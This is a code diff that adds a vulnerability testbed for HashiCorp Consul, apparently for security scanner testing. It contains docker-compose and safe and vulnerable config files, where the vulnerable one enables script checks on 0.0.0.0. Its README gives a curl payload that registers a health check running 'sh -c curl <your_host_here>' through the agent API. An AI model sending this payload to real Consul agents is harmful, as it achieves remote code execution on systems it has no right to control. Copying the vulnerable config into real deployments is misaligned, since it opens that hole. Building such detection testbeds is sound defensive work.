google · robert-doyensec · May 29, 2026 · Jun 5, 2026 · Jun 5, 2026
diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md
@@ -0,0 +1,23 @@
+# Consul Exposed UI (Exposed API)
+This testbed contains vulnerable and safe containers for Consul. The vulnerable version has `-enable-script-checks` and the safe version lacks it.
+
+
+## Docker Compose
+```
+docker compose up
+```
+The vulnerable service will be on port 8081 and the safe service will be on port 8082.
+
+## Confirming the vulnerability
+
+```
+curl -H 'Content-Type: application/json' -X PUT \
+    -d '{
+        "Name": "test",
+        "check": {
+            "Args": ["sh", "-c", "curl <your_host_here>"],
+            "interval": "10s",
+            "timeout": "600s"
+        }
+    }' localhost:8081/v1/agent/service/register
+```
diff --git a/hashicorp/consul/docker-compose.yaml b/hashicorp/consul/docker-compose.yaml
@@ -0,0 +1,21 @@
+version: "3.8"
+
+services:
+  consul-vuln:
+    image: consul:1.2.3
+    container_name: consul-vuln
+    ports:
+      - "8081:8500"
+    volumes:
+    - ./vuln.hcl:/consul/config/vuln.hcl
+    command: agent -config-file=/consul/config/vuln.hcl
+
+  consul-safe:
+    image: consul:1.2.3
+    container_name: consul-safe
+    ports:
+      - "8082:8500"
+    volumes:
+    - ./safe.hcl:/consul/config/safe.hcl
+    command: agent -config-file=/consul/config/safe.hcl
+
diff --git a/hashicorp/consul/safe.hcl b/hashicorp/consul/safe.hcl
@@ -0,0 +1,11 @@
+datacenter = "dc1"
+data_dir  = "/consul/data"
+
+server = true
+bootstrap_expect = 1
+
+enable_script_checks = false
+
+client_addr = "0.0.0.0"
+
+ui = true
diff --git a/hashicorp/consul/vuln.hcl b/hashicorp/consul/vuln.hcl
@@ -0,0 +1,11 @@
+datacenter = "dc1"
+data_dir  = "/consul/data"
+
+server = true
+bootstrap_expect = 1
+
+enable_script_checks = true
+
+client_addr = "0.0.0.0"
+
+ui = true